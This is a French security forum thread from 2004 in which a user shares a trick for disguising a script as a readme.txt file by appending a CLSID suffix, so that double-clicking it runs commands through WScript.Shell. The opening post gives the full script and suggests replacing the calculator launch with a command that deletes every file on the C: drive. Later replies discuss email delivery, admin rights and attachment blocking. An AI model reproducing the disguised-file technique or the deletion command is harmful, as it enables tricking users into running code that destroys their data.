En ce début d'année, jouont avec M$

Ce forum est destiné à accueillir vos posts concernant la sécurité relative aux logiciels microsoft. Ils peuvent aussi bien traiter des systèmes d'exploitation Windows (NT,WIN2K,WINXP), du serveur web IIS, de Microsoft SQL et ainsi de suite...

Modérateur: modos Ixus

Messagepar arapaho » 05 Jan 2004 11:49

Tout d'abord bonne année 2004 à tous. Afinde commencer la nouvelle année dans la joie et l'allégresse, je me permet de vous présenter une petite chose bien sympathique à réaliser sous windows pour vous amuser : <BR> <BR>Cette petite application concerne la fabrication d'un fichier texte assez spécial. En effet, grâce à un editeur de texte quelconque [Notepad, Wordpad, etc ...], il vous suffit de saisir le texte suivant: <BR> <BR><script> <BR>a=new ActiveXObject("WSCript.Shell"); <BR>a.run("CALC"); <BR>alert("I am .HTAn Started command"); <BR></script> <BR> <BR>Il vous suffit ensuite de le sauvegarder sous readme.txt <BR> <BR>Nous allons maintenant renommer, en ne modifiant que la fin du nom: <BR>readme.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} <BR> <BR>Nous avons donc rajouté une série héxadécimale. <BR> <BR>Premiere impression: pour ceux qui n'ont pas configuré leur explorateur windows afin qu'il montre toutes les extensions, ils continueront à voir un simple fichier .txt <BR>Pour les autres, ils verront evidemment le fichier avec toute l'extension. <BR> <BR>Mais là où ca devient sympathique, c'est lorsque qu'on l'exécute. Double cliquez dessus, et hoooo, ça lance une petite calculette. <BR> <BR>On peut evidemment remplacer dans ce petit code le "CALC" par des choses plus amusantes comme "CMD /C DEL /S /F /Q C:*.*" <BR> <BR>Bonne année <IMG SRC="images/smiles/icon_smile.gif">
No One Will Ever Need More Than 640K Ram - Bill Gates, 1981
Avatar de l’utilisateur
arapaho
Amiral
Amiral
 
Messages: 1119
Inscrit le: 18 Avr 2002 00:00
Localisation: Genève

Messagepar jpcheney » 05 Jan 2004 12:00

ma migration sous linux se rapproche a grand pas pour mes deux dernieres machine a basculer !!! <BR> <BR>ce "truc", ca marche sous quels windows (tester sous nt4 : ok) ? <BR>
JeeP
Avatar de l’utilisateur
jpcheney
Enseigne de vaisseau
Enseigne de vaisseau
 
Messages: 157
Inscrit le: 14 Août 2002 00:00

Messagepar nemesis » 05 Jan 2004 12:02

dis dc toi t'as pas donné un moyen de flinguer un dur la <IMG SRC="images/smiles/icon_wink.gif"> <IMG SRC="images/smiles/icon_lol.gif"> <BR> <BR>vilain va <IMG SRC="images/smiles/icon_smile.gif">
ce n'est pas parce qu'il n'y a pas de preuve qu'une chose existe qu'elle ne peut pas exister
Avatar de l’utilisateur
nemesis
Amiral
Amiral
 
Messages: 1954
Inscrit le: 01 Jan 2003 01:00
Localisation: 75

Messagepar arapaho » 05 Jan 2004 12:02

Testé sous win 2000 et win XP
No One Will Ever Need More Than 640K Ram - Bill Gates, 1981
Avatar de l’utilisateur
arapaho
Amiral
Amiral
 
Messages: 1119
Inscrit le: 18 Avr 2002 00:00
Localisation: Genève

Messagepar remi » 05 Jan 2004 14:26

Ca sent l'arrivée d'une multitude de petits virus...
Art de vivre : Mourir pour mourir, que cela soit entre le $%#&! des femmes et le $%#&! des bouteilles !
Avatar de l’utilisateur
remi
AdminIxus
AdminIxus
 
Messages: 3218
Inscrit le: 22 Avr 2002 00:00
Localisation: Lyon

Messagepar arapaho » 05 Jan 2004 15:03

En effet dans les mails avec outlook, le comportement est identique. <BR> <BR>Si la machine est bien configurée et si l'utilisateur dessus n'est pas admin, ca devrait pas poser de problemes [pas testé, je suppute]. <BR> <BR>Il ne faut jamais etre administrateur de sa machine, sauf pour tout ce qui est installation ou maintenance <IMG SRC="images/smiles/icon_smile.gif">
No One Will Ever Need More Than 640K Ram - Bill Gates, 1981
Avatar de l’utilisateur
arapaho
Amiral
Amiral
 
Messages: 1119
Inscrit le: 18 Avr 2002 00:00
Localisation: Genève

Messagepar klimmrod » 05 Jan 2004 15:10

C vrai qu'il faut jamais être administrateur de sa machine, mais le problème avec microsoft c'est que si tu veux changer la plus petite chose tu dois te déloger reloger. C'est pas comme dans les unix ou tu fais un petit su et hop c'est parti. Si il existe une autre solution chez microsoft, je suis preneur. <BR> <BR> <BR> <BR> <BR> <BR>
Avatar de l’utilisateur
klimmrod
Premier-Maître
Premier-Maître
 
Messages: 58
Inscrit le: 31 Oct 2003 01:00
Localisation: Belgique,Luxembourg

Messagepar korosv » 05 Jan 2004 15:15

il y a le runas, pour executer un programme en tant que ... <BR>
Avatar de l’utilisateur
korosv
Capitaine de vaisseau
Capitaine de vaisseau
 
Messages: 256
Inscrit le: 02 Juil 2003 00:00
Localisation: Saturne

Messagepar tomtom » 05 Jan 2004 15:40

Tout simplement effrayant... brrr <BR> <BR> <BR>t. <BR> <BR> [edit] <BR> <BR>Outlook bloque l'acces aparemment à la piece jointe. C'est deja ça ! [/edit] <BR> <BR>_________________ <BR><!-- BBCode Start --><IMG SRC="http://louisstos.online.fr/images/xmas.gif"" BORDER="0"><!-- BBCode End --> "Unix is user friendly. He's just very picky about who his friends are... "<BR><BR><font size=-2></font>
One hundred thousand lemmings can't be wrong...
Avatar de l’utilisateur
tomtom
Amiral
Amiral
 
Messages: 6035
Inscrit le: 26 Avr 2002 00:00
Localisation: Paris

Messagepar lucyfire » 05 Jan 2004 15:48

he ben on a pas fini de se faire ch... avec ça ! et une de plus une ... <BR> <BR>lcf
"Les hommes déprécient ce qu'ils ne peuvent comprendre." [Goethe]
Avatar de l’utilisateur
lucyfire
Amiral
Amiral
 
Messages: 1109
Inscrit le: 15 Mai 2003 00:00
Localisation: Lyon

Messagepar Muzo » 05 Jan 2004 16:09

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-2>En réponse à:</font><HR></TD></TR><TR><TD><FONT SIZE=-2><BLOCKQUOTE> <BR>Le 2004-01-05 14:40, tomtom a écrit: <BR>Tout simplement effrayant... brrr <BR> <BR> <BR>t. <BR> <BR> [edit] <BR> <BR>Outlook bloque l'acces aparemment à la piece jointe. C'est deja ça ! [/edit] <BR> <BR>_________________ <BR><!-- BBCode Start --><IMG SRC="http://louisstos.online.fr/images/xmas.gif"" BORDER="0"><!-- BBCode End --> "Unix is user friendly. He's just very picky about who his friends are... " <BR> <BR><font size=-2></font> <BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End --> <BR> <BR> <BR>Outlook oui, mais Outlook Express non. Et lequel des 2 est le plus utilisé??? Express ... <IMG SRC="images/smiles/icon_mad.gif">
/Muzo
"La vie n'est pas un combat, mais une passion à défendre!" MASS HYSTERIA - Knowledge is power
Avatar de l’utilisateur
Muzo
Amiral
Amiral
 
Messages: 5236
Inscrit le: 07 Mai 2003 00:00
Localisation: BNF! Je me culturise.

Messagepar nemesis » 05 Jan 2004 16:13

outlook express le fait en version 6 (en fait il y a un onglet dans securite pour bloquer les pieces jointes mais c assez bourrin car les pieces jointes ne sont plus accessible a part aller les chercher à la main ds le répertoire temporaire pas tres cool.... <BR> <BR>@+ <BR>Nem.
ce n'est pas parce qu'il n'y a pas de preuve qu'une chose existe qu'elle ne peut pas exister
Avatar de l’utilisateur
nemesis
Amiral
Amiral
 
Messages: 1954
Inscrit le: 01 Jan 2003 01:00
Localisation: 75

Messagepar Muzo » 05 Jan 2004 16:25

Oui, c'est vrai. Mais dans la plupart des boites à l'heure actuelle tournent sous windows 2000 avec express installé par défaut. <IMG SRC="images/smiles/icon_frown.gif"> <BR>Pas Glop!
/Muzo
"La vie n'est pas un combat, mais une passion à défendre!" MASS HYSTERIA - Knowledge is power
Avatar de l’utilisateur
Muzo
Amiral
Amiral
 
Messages: 5236
Inscrit le: 07 Mai 2003 00:00
Localisation: BNF! Je me culturise.


Retour vers Logiciels Microsoft

Qui est en ligne ?

Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 1 invité